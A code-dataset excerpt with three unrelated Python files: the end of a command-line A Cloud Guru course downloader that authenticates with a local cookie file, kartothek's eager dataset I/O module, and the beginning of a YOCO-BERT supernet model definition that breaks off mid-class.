'-c', '--cookies',
dest='cookies',
type=str,
help="Cookies to authenticate with.", metavar='')
advance = parser.add_argument_group("Advance")
advance.add_argument(
'-o', '--output',
dest='output',
type=str,
help="Download to specific directory.", metavar='')
advance.add_argument(
'-q', '--quality',
dest='quality',
type=int,
help="Download specific video quality.", metavar='')
advance.add_argument(
'-i', '--info',
dest='info',
action='store_true',
help="List all lectures with available resolution.")
advance.add_argument(
'-a', '--all',
dest='download_all',
action='store_true',
help="Download all courses without any prompt (default: false).")
advance.add_argument(
'-n', '--new',
dest='download_only_new',
action='store_true',
help="Download only courses that have not already been downloaded (default: false).")
advance.add_argument(
'-e', '--extension',
dest='extension',
type=str,
help="Rename course lecture video/audio files extension to defined by user.")
options = parser.parse_args()
if not options.cookies:
prompt = fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "cookie filename : " + fg + sb
filename = getpass._getuser(prompt=prompt)
if os.path.isfile(filename):
f_in = open(filename)
cookies = '\n'.join([line for line in (lines.strip() for lines in f_in) if line])
f_in.close()
cloud_guru = CloudGuru(cookies=cookies)
if options.info:
cloud_guru.courses_downloaded(path=options.output, download_only_new=options.download_only_new)
if not options.info:
cloud_guru.course_download(path=options.output, quality=options.quality,
user_extension=options.extension,
download_all=options.download_all,
download_only_new=options.download_only_new)
else:
sys.stdout.write(
'\n' + fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "file containing request headers is required.\n")
sys.exit(0)
if options.cookies:
if os.path.isfile(options.cookies):
f_in = open(options.cookies)
cookies = '\n'.join([line for line in (lines.strip() for lines in f_in) if line])
f_in.close()
cloud_guru = CloudGuru(cookies=cookies)
if options.info:
cloud_guru.courses_downloaded(path=options.output, download_only_new=options.download_only_new)
if not options.info:
cloud_guru.course_download(path=options.output, quality=options.quality,
user_extension=options.extension,
download_all=options.download_all,
download_only_new=options.download_only_new)
else:
sys.stdout.write(
'\n' + fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "unable to find file '%s'.\n" % options.cookies)
sys.exit(0)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
sys.stdout.write('\n' + fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sd + "User Interrupted..\n")
sys.exit(0)

avg_line_length: 53.293689 | max_line_length: 159 | alphanum_fraction: 0.478799

hexsha: 53b63a008b1f33e803cfd4b04978d5850667f189 | size: 27,087 | ext: py | lang: Python
repo path: kartothek/io/eager.py | repo name: jorisvandenbossche/kartothek | head_hexsha: 18b11e7b060bb778668ffc4e2f468910120e6385 | licenses: ["MIT"] (same across the max_stars/max_issues/max_forks columns)
max_stars_count: 2 (2019-05-29T09:45:20.000Z to 2019-06-24T19:06:46.000Z) | max_issues_count: 18 (2019-11-15T15:33:53.000Z to 2022-03-04T02:08:18.000Z) | max_forks_count: null
content:
import warnings
from functools import partial
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union, cast
import pandas as pd
from kartothek.core.common_metadata import (
empty_dataframe_from_schema,
make_meta,
store_schema_metadata,
)
from kartothek.core.dataset import DatasetMetadata, DatasetMetadataBuilder
from kartothek.core.docs import default_docs
from kartothek.core.factory import DatasetFactory, _ensure_factory
from kartothek.core.naming import (
DEFAULT_METADATA_STORAGE_FORMAT,
DEFAULT_METADATA_VERSION,
PARQUET_FILE_SUFFIX,
get_partition_file_prefix,
)
from kartothek.core.typing import StoreInput
from kartothek.core.utils import lazy_store
from kartothek.io.iter import store_dataframes_as_dataset__iter
from kartothek.io_components.delete import (
delete_common_metadata,
delete_indices,
delete_top_level_metadata,
)
from kartothek.io_components.gc import delete_files, dispatch_files_to_gc
from kartothek.io_components.index import update_indices_from_partitions
from kartothek.io_components.metapartition import (
SINGLE_TABLE,
MetaPartition,
parse_input_to_metapartition,
)
from kartothek.io_components.read import dispatch_metapartitions_from_factory
from kartothek.io_components.update import update_dataset_from_partitions
from kartothek.io_components.utils import (
_ensure_compatible_indices,
align_categories,
normalize_args,
sort_values_categorical,
validate_partition_keys,
)
from kartothek.io_components.write import raise_if_dataset_exists
from kartothek.serialization import DataFrameSerializer
@default_docs
@normalize_args
def delete_dataset(dataset_uuid=None, store=None, factory=None):
"""
Delete the entire dataset from the store.
Parameters
----------
"""
ds_factory = _ensure_factory(
dataset_uuid=dataset_uuid,
load_schema=False,
store=store,
factory=factory,
load_dataset_metadata=False,
)
# Remove possibly unreferenced files
garbage_collect_dataset(factory=ds_factory)
# Delete indices first since they do not affect dataset integrity
delete_indices(dataset_factory=ds_factory)
for metapartition in dispatch_metapartitions_from_factory(ds_factory):
metapartition = cast(MetaPartition, metapartition)
metapartition.delete_from_store(dataset_uuid=dataset_uuid, store=store)
# delete common metadata after partitions
delete_common_metadata(dataset_factory=ds_factory)
# Delete the top level metadata file
delete_top_level_metadata(dataset_factory=ds_factory)
@default_docs
def read_dataset_as_dataframes(
dataset_uuid: Optional[str] = None,
store=None,
tables: Optional[List[str]] = None,
columns: Dict[str, List[str]] = None,
concat_partitions_on_primary_index: bool = False,
predicate_pushdown_to_io: bool = True,
categoricals: Dict[str, List[str]] = None,
label_filter: Callable = None,
dates_as_object: bool = False,
predicates: Optional[List[List[Tuple[str, str, Any]]]] = None,
factory: Optional[DatasetFactory] = None,
dispatch_by: Optional[List[str]] = None,
) -> List[pd.DataFrame]:
"""
Read a dataset as a list of dataframes.
Every element of the list corresponds to a physical partition.
Parameters
----------
Returns
-------
List[pandas.DataFrame]
Returns a list of pandas.DataFrame. One element per partition
Examples
--------
Dataset in store contains two partitions with two files each
.. code ::
>>> import storefact
>>> from kartothek.io.eager import read_dataset_as_dataframes
>>> store = storefact.get_store_from_url('s3://bucket_with_dataset')
>>> dfs = read_dataset_as_dataframes('dataset_uuid', store, 'core')
"""
ds_factory = _ensure_factory(
dataset_uuid=dataset_uuid,
store=store,
factory=factory,
load_dataset_metadata=True,
)
mps = read_dataset_as_metapartitions(
tables=tables,
columns=columns,
concat_partitions_on_primary_index=concat_partitions_on_primary_index,
predicate_pushdown_to_io=predicate_pushdown_to_io,
categoricals=categoricals,
label_filter=label_filter,
dates_as_object=dates_as_object,
predicates=predicates,
factory=ds_factory,
dispatch_by=dispatch_by,
dispatch_metadata=False,
)
return [mp.data for mp in mps]
@default_docs
def read_dataset_as_metapartitions(
dataset_uuid=None,
store=None,
tables=None,
columns=None,
concat_partitions_on_primary_index=False,
predicate_pushdown_to_io=True,
categoricals=None,
label_filter=None,
dates_as_object=False,
predicates=None,
factory=None,
dispatch_by=None,
dispatch_metadata=True,
):
"""
Read a dataset as a list of :class:`kartothek.io_components.metapartition.MetaPartition`.
Every element of the list corresponds to a physical partition.
Parameters
----------
Returns
-------
List[kartothek.io_components.metapartition.MetaPartition]
        Returns a list of MetaPartition objects, one element per physical partition
Examples
--------
Dataset in store contains two partitions with two files each
.. code ::
>>> import storefact
>>> from kartothek.io.eager import read_dataset_as_dataframe
>>> store = storefact.get_store_from_url('s3://bucket_with_dataset')
>>> list_mps = read_dataset_as_metapartitions('dataset_uuid', store, 'core')
"""
ds_factory = _ensure_factory(
dataset_uuid=dataset_uuid,
store=store,
factory=factory,
load_dataset_metadata=False,
)
if len(ds_factory.tables) > 1:
warnings.warn(
"Trying to read a dataset with multiple internal tables. This functionality will be removed in the next "
"major release. If you require a multi tabled data format, we recommend to switch to the kartothek Cube "
"functionality. "
"https://kartothek.readthedocs.io/en/stable/guide/cube/kartothek_cubes.html",
DeprecationWarning,
)
from .iter import read_dataset_as_metapartitions__iterator
ds_iter = read_dataset_as_metapartitions__iterator(
tables=tables,
columns=columns,
concat_partitions_on_primary_index=concat_partitions_on_primary_index,
predicate_pushdown_to_io=predicate_pushdown_to_io,
categoricals=categoricals,
label_filter=label_filter,
dates_as_object=dates_as_object,
predicates=predicates,
factory=ds_factory,
dispatch_by=dispatch_by,
dispatch_metadata=dispatch_metadata,
)
return list(ds_iter)
def _check_compatible_list(table, obj, argument_name=""):
if obj is None:
return obj
elif isinstance(obj, dict):
if table not in obj:
raise ValueError(
"Provided table {} is not compatible with input from argument {}.".format(
table, argument_name
)
)
return obj
elif isinstance(obj, list):
return {table: obj}
else:
raise TypeError(
"Unknown type encountered for argument {}. Expected `list`, got `{}` instead".format(
argument_name, type(obj)
)
)
@default_docs
def read_table(
dataset_uuid: Optional[str] = None,
store=None,
table: Optional[str] = SINGLE_TABLE,
columns: Dict[str, List[str]] = None,
concat_partitions_on_primary_index: bool = False,
predicate_pushdown_to_io: bool = True,
categoricals: Dict[str, List[str]] = None,
label_filter: Callable = None,
dates_as_object: bool = False,
predicates: Optional[List[List[Tuple[str, str, Any]]]] = None,
factory: Optional[DatasetFactory] = None,
) -> pd.DataFrame:
"""
A utility function to load a single table with multiple partitions as a single dataframe in one go.
Mostly useful for smaller tables or datasets where all partitions fit into memory.
The order of partitions is not guaranteed to be stable in the resulting dataframe.
Parameters
----------
Returns
-------
pandas.DataFrame
Returns a pandas.DataFrame holding the data of the requested columns
Examples
--------
Dataset in store contains two partitions with two files each
.. code ::
>>> import storefact
>>> from kartothek.io.eager import read_table
>>> store = storefact.get_store_from_url('s3://bucket_with_dataset')
    >>> df = read_table('dataset_uuid', store, 'core')
"""
if concat_partitions_on_primary_index is not False:
warnings.warn(
"The keyword `concat_partitions_on_primary_index` is deprecated and will be removed in the next major release.",
DeprecationWarning,
)
if not isinstance(table, str):
raise TypeError("Argument `table` needs to be a string")
columns = _check_compatible_list(table, columns, "columns")
categoricals = _check_compatible_list(table, categoricals, "categoricals")
ds_factory = _ensure_factory(
dataset_uuid=dataset_uuid,
store=store,
factory=factory,
load_dataset_metadata=False,
)
partitions = read_dataset_as_dataframes(
tables=[table],
columns=columns,
concat_partitions_on_primary_index=concat_partitions_on_primary_index,
predicate_pushdown_to_io=predicate_pushdown_to_io,
categoricals=categoricals,
label_filter=label_filter,
dates_as_object=dates_as_object,
predicates=predicates,
factory=ds_factory,
)
empty_df = empty_dataframe_from_schema(
schema=ds_factory.table_meta[table],
columns=columns[table] if columns is not None else None,
)
if categoricals:
empty_df = empty_df.astype({col: "category" for col in categoricals[table]})
dfs = [partition_data[table] for partition_data in partitions] + [empty_df]
# require meta 4 otherwise, can't construct types/columns
if categoricals:
dfs = align_categories(dfs, categoricals[table])
df = pd.concat(dfs, ignore_index=True, sort=False)
# ensure column order
if len(empty_df.columns) > 0 and list(empty_df.columns) != list(df.columns):
df = df.reindex(empty_df.columns, copy=False, axis=1)
return df
@default_docs
@normalize_args
def commit_dataset(
store: Optional[StoreInput] = None,
dataset_uuid: Optional[str] = None,
new_partitions: Optional[Iterable[MetaPartition]] = None,
output_dataset_uuid: Optional[str] = None,
delete_scope: Optional[Iterable[Dict[str, Any]]] = None,
metadata: Dict = None,
df_serializer: DataFrameSerializer = None,
metadata_merger: Callable[[List[Dict]], Dict] = None,
default_metadata_version: int = DEFAULT_METADATA_VERSION,
partition_on: Optional[Iterable[str]] = None,
factory: Optional[DatasetFactory] = None,
secondary_indices: Optional[Iterable[str]] = None,
):
"""
Commit new state to an existing dataset. This can be used for three distinct operations
1. Add previously written partitions to this dataset
        If, for some reason, the existing pipelines are not sufficient but you need more control, you can write the files outside of a kartothek pipeline and commit them whenever you choose to.
This should be used in combination with
:func:`~kartothek.io.eager.write_single_partition` and :func:`~kartothek.io.eager.create_empty_dataset_header`.
.. code::
import pandas as pd
from kartothek.io.eager import write_single_partition, commit_dataset
store = "hfs://my_store"
# The partition writing can be done concurrently and distributed if wanted.
# Only the information about what partitions have been written is required for the commit.
new_partitions = [
write_single_partition(
store=store,
dataset_uuid='dataset_uuid',
data=pd.DataFrame({'column': [1, 2]}),
)
]
new_dataset = commit_dataset(
store=store,
dataset_uuid='dataset_uuid',
new_partitions=new_partitions,
)
2. Simple delete of partitions
        If you want to remove some partitions, this is one of the simplest ways of doing so. Simply providing a delete_scope removes the references to these files in an atomic commit.
.. code::
commit_dataset(
store=store,
dataset_uuid='dataset_uuid',
delete_scope=[
{
"partition_column": "part_value_to_be_removed"
}
],
)
3. Add additional metadata
To add new metadata to an existing dataset
.. code::
commit_dataset(
store=store,
dataset_uuid='dataset_uuid',
metadata={"new": "user_metadata"},
)
Note::
        If you do not want the new metadata to be merged with the existing one, provide a custom ``metadata_merger``
Parameters
----------
new_partitions:
Input partition to be committed.
"""
if output_dataset_uuid is not None:
warnings.warn(
"The keyword `output_dataset_uuid` has no use and will be removed in the next major release ",
DeprecationWarning,
)
if df_serializer is not None:
warnings.warn(
"The keyword `df_serializer` is deprecated and will be removed in the next major release.",
DeprecationWarning,
)
if not new_partitions and not metadata and not delete_scope:
raise ValueError(
"Need to provide either new data, new metadata or a delete scope. None of it was provided."
)
store = lazy_store(store)
ds_factory, metadata_version, partition_on = validate_partition_keys(
dataset_uuid=dataset_uuid,
store=store,
ds_factory=factory,
default_metadata_version=default_metadata_version,
partition_on=partition_on,
)
mps = parse_input_to_metapartition(
new_partitions, metadata_version=metadata_version
)
if secondary_indices:
mps = mps.build_indices(columns=secondary_indices)
mps_list = [_maybe_infer_files_attribute(mp, dataset_uuid) for mp in mps]
dmd = update_dataset_from_partitions(
mps_list,
store_factory=store,
dataset_uuid=dataset_uuid,
ds_factory=ds_factory,
delete_scope=delete_scope,
metadata=metadata,
metadata_merger=metadata_merger,
)
return dmd
def _maybe_infer_files_attribute(metapartition, dataset_uuid):
new_mp = metapartition.as_sentinel()
for mp in metapartition:
if len(mp.files) == 0:
if mp.data is None or len(mp.data) == 0:
raise ValueError(
"Trying to commit partitions without `data` or `files` information."
"Either one is necessary to infer the dataset tables"
)
new_files = {}
for table in mp.data:
new_files[table] = (
get_partition_file_prefix(
dataset_uuid=dataset_uuid,
partition_label=mp.label,
table=table,
metadata_version=mp.metadata_version,
)
+ PARQUET_FILE_SUFFIX # noqa: W503 line break before binary operator
)
mp = mp.copy(files=new_files)
new_mp = new_mp.add_metapartition(mp)
return new_mp
@default_docs
@normalize_args
def store_dataframes_as_dataset(
store,
dataset_uuid,
dfs,
metadata=None,
partition_on=None,
df_serializer=None,
overwrite=False,
secondary_indices=None,
metadata_storage_format=DEFAULT_METADATA_STORAGE_FORMAT,
metadata_version=DEFAULT_METADATA_VERSION,
):
"""
Utility function to store a list of dataframes as a partitioned dataset with multiple tables (files).
Useful for very small datasets where all data fits into memory.
Parameters
----------
dfs: List[Union[pd.DataFrame, Dict[str, pd.DataFrame]]]
The dataframe(s) to be stored.
Returns
-------
The stored dataset
"""
if isinstance(dfs, (pd.DataFrame, dict)):
dfs = [dfs]
warnings.warn(
"Passing a single dataframe instead of an iterable is deprecated and may "
"be removed in the next major release.",
DeprecationWarning,
)
return store_dataframes_as_dataset__iter(
dfs,
store=store,
dataset_uuid=dataset_uuid,
metadata=metadata,
partition_on=partition_on,
df_serializer=df_serializer,
overwrite=overwrite,
secondary_indices=secondary_indices,
metadata_storage_format=metadata_storage_format,
metadata_version=metadata_version,
)
@default_docs
@normalize_args
def create_empty_dataset_header(
store,
dataset_uuid,
table_meta,
partition_on=None,
metadata=None,
overwrite=False,
metadata_storage_format=DEFAULT_METADATA_STORAGE_FORMAT,
metadata_version=DEFAULT_METADATA_VERSION,
):
"""
    Create a dataset header without any partitions. This may be used in combination
with :func:`~kartothek.io.eager.write_single_partition` to create implicitly partitioned datasets.
.. note::
        The created dataset will **always** have explicit_partitions==False
.. warning::
This function should only be used in very rare occasions. Usually you're better off using
full end-to-end pipelines.
Parameters
----------
"""
store = lazy_store(store)()
if not overwrite:
raise_if_dataset_exists(dataset_uuid=dataset_uuid, store=store)
for table, schema in table_meta.items():
table_meta[table] = make_meta(schema, origin=table, partition_keys=partition_on)
store_schema_metadata(
schema=table_meta[table],
dataset_uuid=dataset_uuid,
store=store,
table=table,
)
dataset_builder = DatasetMetadataBuilder(
uuid=dataset_uuid,
metadata_version=metadata_version,
partition_keys=partition_on,
explicit_partitions=False,
table_meta=table_meta,
)
if metadata:
for key, value in metadata.items():
dataset_builder.add_metadata(key, value)
if metadata_storage_format.lower() == "json":
store.put(*dataset_builder.to_json())
elif metadata_storage_format.lower() == "msgpack":
store.put(*dataset_builder.to_msgpack())
else:
raise ValueError(
"Unknown metadata storage format encountered: {}".format(
metadata_storage_format
)
)
return dataset_builder.to_dataset()
@default_docs
@normalize_args
def write_single_partition(
store=None,
dataset_uuid=None,
data=None,
metadata=None,
df_serializer=None,
overwrite=False,
metadata_merger=None,
metadata_version=DEFAULT_METADATA_VERSION,
partition_on=None,
factory=None,
secondary_indices=None,
):
"""
Write the parquet file(s) for a single partition. This will **not** update the dataset header and can therefore
be used for highly concurrent dataset writes.
For datasets with explicit partitions, the dataset header can be updated by calling
:func:`kartothek.io.eager.commit_dataset` with the output of this function.
.. note::
It is highly recommended to use the full pipelines whenever possible. This functionality should be
used with caution and should only be necessary in cases where traditional pipeline scheduling is not an
option.
.. note::
This function requires an existing dataset metadata file and the schemas for the tables to be present.
Either you have ensured that the dataset always exists though some other means or use
:func:`create_empty_dataset_header` at the start of your computation to ensure the basic dataset
metadata is there.
Parameters
----------
data: Dict
The input is defined according to :func:`~kartothek.io_components.metapartition.parse_input_to_metapartition`
Returns
-------
An empty :class:`~kartothek.io_components.metapartition.MetaPartition` referencing the new files
"""
if metadata is not None:
warnings.warn(
"The keyword `metadata` has no use and will be removed in the next major release ",
DeprecationWarning,
)
if overwrite is not False:
warnings.warn(
"The keyword `overwrite` has no use and will be removed in the next major release ",
DeprecationWarning,
)
if metadata_merger is not None:
warnings.warn(
"The keyword `metadata_merger` has no use and will be removed in the next major release ",
DeprecationWarning,
)
if data is None:
raise TypeError("The parameter `data` is not optional")
_, ds_metadata_version, partition_on = validate_partition_keys(
dataset_uuid=dataset_uuid,
store=lazy_store(store),
ds_factory=factory,
default_metadata_version=metadata_version,
partition_on=partition_on,
)
mp = parse_input_to_metapartition(obj=data, metadata_version=ds_metadata_version)
if partition_on:
mp = mp.partition_on(partition_on)
if secondary_indices:
mp = mp.build_indices(columns=secondary_indices)
mp = mp.validate_schema_compatible(dataset_uuid=dataset_uuid, store=store)
mp = mp.store_dataframes(
store=store, dataset_uuid=dataset_uuid, df_serializer=df_serializer
)
return mp
@default_docs
@normalize_args
def update_dataset_from_dataframes(
df_list: List[Union[pd.DataFrame, Dict[str, pd.DataFrame]]],
store=None,
dataset_uuid: Optional[str] = None,
delete_scope=None,
metadata=None,
df_serializer=None,
metadata_merger: Callable = None,
central_partition_metadata: bool = True,
default_metadata_version=DEFAULT_METADATA_VERSION,
partition_on: Optional[List[str]] = None,
load_dynamic_metadata: bool = True,
sort_partitions_by: Optional[str] = None,
secondary_indices: Optional[List[str]] = None,
factory: Optional[DatasetFactory] = None,
) -> DatasetMetadata:
"""
Update a kartothek dataset in store at once, using a list of dataframes.
Useful for datasets which do not fit into memory.
Parameters
----------
df_list: List[Union[pd.DataFrame, Dict[str, pd.DataFrame]]]
The dataframe(s) to be stored.
Returns
-------
The dataset metadata object (:class:`~kartothek.core.dataset.DatasetMetadata`).
"""
if load_dynamic_metadata is not True:
warnings.warn(
"The keyword `load_dynamic_metadata` has no use and will be removed in the next major release ",
DeprecationWarning,
)
if central_partition_metadata is not True:
warnings.warn(
"The keyword `central_partition_metadata` has no use and will be removed in the next major release ",
DeprecationWarning,
)
ds_factory, metadata_version, partition_on = validate_partition_keys(
dataset_uuid=dataset_uuid,
store=store,
ds_factory=factory,
default_metadata_version=default_metadata_version,
partition_on=partition_on,
)
secondary_indices = _ensure_compatible_indices(ds_factory, secondary_indices)
mp = parse_input_to_metapartition(
df_list,
metadata_version=metadata_version,
expected_secondary_indices=secondary_indices,
)
if sort_partitions_by:
mp = mp.apply(partial(sort_values_categorical, columns=sort_partitions_by))
if partition_on:
mp = mp.partition_on(partition_on)
if secondary_indices:
mp = mp.build_indices(secondary_indices)
mp = mp.store_dataframes(
store=store, dataset_uuid=dataset_uuid, df_serializer=df_serializer
)
return update_dataset_from_partitions(
mp,
store_factory=store,
dataset_uuid=dataset_uuid,
ds_factory=ds_factory,
delete_scope=delete_scope,
metadata=metadata,
metadata_merger=metadata_merger,
)
@default_docs
@normalize_args
def build_dataset_indices(store, dataset_uuid, columns, factory=None):
"""
Function which builds a :class:`~kartothek.core.index.ExplicitSecondaryIndex`.
This function loads the dataset, computes the requested indices and writes
    the indices to the dataset. The dataset partitions themselves are not mutated.
Parameters
----------
"""
ds_factory = _ensure_factory(
dataset_uuid=dataset_uuid,
store=store,
factory=factory,
load_dataset_metadata=False,
)
cols_to_load = {
table: set(columns) & set(meta.names)
for table, meta in ds_factory.table_meta.items()
}
cols_to_load = {table: cols for table, cols in cols_to_load.items() if cols}
new_partitions = []
for mp in dispatch_metapartitions_from_factory(ds_factory):
mp = mp.load_dataframes(
store=ds_factory.store,
tables=list(cols_to_load.keys()),
columns=cols_to_load,
)
mp = mp.build_indices(columns=columns)
mp = mp.remove_dataframes() # Remove dataframe from memory
new_partitions.append(mp)
return update_indices_from_partitions(
new_partitions, dataset_metadata_factory=ds_factory
)
@default_docs
@normalize_args
def garbage_collect_dataset(dataset_uuid=None, store=None, factory=None):
"""
Remove auxiliary files that are no longer tracked by the dataset.
These files include indices that are no longer referenced by the metadata
as well as files in the directories of the tables that are no longer
referenced. The latter is only applied to static datasets.
Parameters
----------
"""
ds_factory = _ensure_factory(
dataset_uuid=dataset_uuid,
store=store,
factory=factory,
load_dataset_metadata=False,
)
nested_files = dispatch_files_to_gc(
dataset_uuid=None, store_factory=None, chunk_size=None, factory=ds_factory
)
# Given that `nested_files` is a generator with a single element, just
# return the output of `delete_files` on that element.
return delete_files(next(nested_files), store_factory=ds_factory.store_factory)

avg_line_length: 31.754982 | max_line_length: 193 | alphanum_fraction: 0.675195
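The record above is kartothek's eager IO module. As a hedged sketch of how the functions documented in it fit together (store a small partitioned dataset, then read it back), the example below follows the docstring examples in that file; the `hfs://` store URL and the dataset UUID are placeholders.

```python
# Illustrative sketch assembled from the docstrings above; "hfs://my_example_store"
# and "example_uuid" are placeholders, mirroring the docstring's "hfs://my_store".
import pandas as pd

from kartothek.io.eager import read_table, store_dataframes_as_dataset

store_url = "hfs://my_example_store"  # kartothek accepts storefact-style store URLs

store_dataframes_as_dataset(
    store=store_url,
    dataset_uuid="example_uuid",
    dfs=[pd.DataFrame({"part": ["a", "a", "b"], "value": [1, 2, 3]})],
    partition_on=["part"],  # one file group per value of "part"
)

# Loads every partition of the default table back into a single dataframe.
df = read_table(dataset_uuid="example_uuid", store=store_url)
print(df.sort_values("value"))
```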

hexsha: 6a275e1ab187a61d2eff4c4d582262ecd8e91629 | size: 26,437 | ext: py | lang: Python
repo path: model/supermodel.py | repo name: MAC-AutoML/YOCO-BERT | head_hexsha: 94e513999524b5d5a9fb19ec93d2c05ce08ee5b7 | licenses: ["MIT"] (same across the max_stars/max_issues/max_forks columns)
max_stars_count: 41 (2021-06-05T02:50:07.000Z to 2022-03-17T06:19:05.000Z) | max_issues_count: 3 (2021-07-01T05:36:09.000Z to 2021-07-19T04:39:29.000Z) | max_forks_count: 5 (2021-06-07T02:58:40.000Z to 2021-09-04T07:14:44.000Z)
content:
# -*- coding: utf-8 -*-
import sys
sys.path.append('./')
import math
import os
import warnings
from dataclasses import dataclass
from typing import Optional, Tuple
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss, MSELoss
import transformers
from transformers.activations import ACT2FN
from transformers.configuration_bert import BertConfig
from transformers.file_utils import ModelOutput
from transformers.modeling_bert import load_tf_weights_in_bert
from transformers.modeling_utils import (
PreTrainedModel,
apply_chunking_to_forward,
find_pruneable_heads_and_indices,
prune_linear_layer,
)
from modules.embeddingsuper import SuperEmbedding
from modules.layernormsuper import SuperLayerNorm
from modules.linearsuper import SuperLinear
class BertEmbeddings(nn.Module):
def __init__(self, config):
super().__init__()
self.word_embeddings = SuperEmbedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
self.position_embeddings = SuperEmbedding(config.max_position_embeddings, config.hidden_size)
self.token_type_embeddings = SuperEmbedding(config.type_vocab_size, config.hidden_size)
self.LayerNorm = SuperLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
self.sample_hidden_size = None
def forward(self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None):
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
seq_length = input_shape[1]
if position_ids is None:
position_ids = self.position_ids[:, :seq_length]
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)
if inputs_embeds is None:
inputs_embeds = self.word_embeddings(input_ids)
position_embeddings = self.position_embeddings(position_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = inputs_embeds + position_embeddings + token_type_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
def set_sample_config(self, bert_hidden_size):
self.sample_hidden_size = bert_hidden_size
self.word_embeddings.set_sample_config(bert_hidden_size)
self.position_embeddings.set_sample_config(bert_hidden_size)
self.token_type_embeddings.set_sample_config(bert_hidden_size)
self.LayerNorm.set_sample_config(bert_hidden_size)
class BertSelfAttention(nn.Module):
def __init__(self, config):
super().__init__()
if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
raise ValueError(
"The hidden size (%d) is not a multiple of the number of attention "
"heads (%d)" % (config.hidden_size, config.num_attention_heads)
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = SuperLinear(config.hidden_size, self.all_head_size)
self.key = SuperLinear(config.hidden_size, self.all_head_size)
self.value = SuperLinear(config.hidden_size, self.all_head_size)
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
self.sample_hidden_size = None
self.sample_num_attention_heads = None
self.sample_attention_head_size = None
self.sample_all_head_size = None
self.super_hidden_size = config.hidden_size
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.sample_num_attention_heads, self.sample_attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
):
mixed_query_layer = self.query(hidden_states)
if encoder_hidden_states is not None:
mixed_key_layer = self.key(encoder_hidden_states)
mixed_value_layer = self.value(encoder_hidden_states)
attention_mask = encoder_attention_mask
else:
mixed_key_layer = self.key(hidden_states)
mixed_value_layer = self.value(hidden_states)
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
if attention_mask is not None:
attention_scores = attention_scores + attention_mask
attention_probs = nn.Softmax(dim=-1)(attention_scores)
attention_probs = self.dropout(attention_probs)
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.sample_all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
return outputs
def set_sample_config(self, bert_hidden_size, bert_head_num):
self.sample_hidden_size = bert_hidden_size
self.sample_num_attention_heads = bert_head_num
self.sample_attention_head_size = self.attention_head_size
self.sample_all_head_size = self.sample_num_attention_heads * self.sample_attention_head_size
self.query.set_sample_config(sample_in_dim = self.sample_hidden_size, sample_out_dim = self.sample_all_head_size)
self.key.set_sample_config(sample_in_dim = self.sample_hidden_size, sample_out_dim = self.sample_all_head_size)
self.value.set_sample_config(sample_in_dim = self.sample_hidden_size, sample_out_dim = self.sample_all_head_size)
class BertSelfOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = SuperLinear(config.hidden_size, config.hidden_size)
self.LayerNorm = SuperLayerNorm(config.hidden_size, eps = config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.sample_hidden_size = None
self.sample_head_num = None
self.origin_num_attention_heads = config.num_attention_heads
self.origin_attention_head_size = int(config.hidden_size / config.num_attention_heads)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
def set_sample_config(self, bert_hidden_size, bert_head_num):
self.sample_hidden_size = bert_hidden_size
self.sample_head_num = bert_head_num
self.sample_all_head_size = self.origin_attention_head_size * self.sample_head_num
self.dense.set_sample_config(self.sample_all_head_size, self.sample_hidden_size)
self.LayerNorm.set_sample_config(self.sample_hidden_size)
class BertAttention(nn.Module):
def __init__(self, config):
super().__init__()
self.self = BertSelfAttention(config)
self.output = BertSelfOutput(config)
self.pruned_heads = set()
self.sample_hidden_size = None
self.sample_num_attention_heads = None
def prune_heads(self, heads):
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(
heads, self.self.num_attention_heads, self.self.attention_head_size, self.pruned_heads
)
self.self.query = prune_linear_layer(self.self.query, index)
self.self.key = prune_linear_layer(self.self.key, index)
self.self.value = prune_linear_layer(self.self.value, index)
self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
self.self.num_attention_heads = self.self.num_attention_heads - len(heads)
self.self.all_head_size = self.self.attention_head_size * self.self.num_attention_heads
self.pruned_heads = self.pruned_heads.union(heads)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
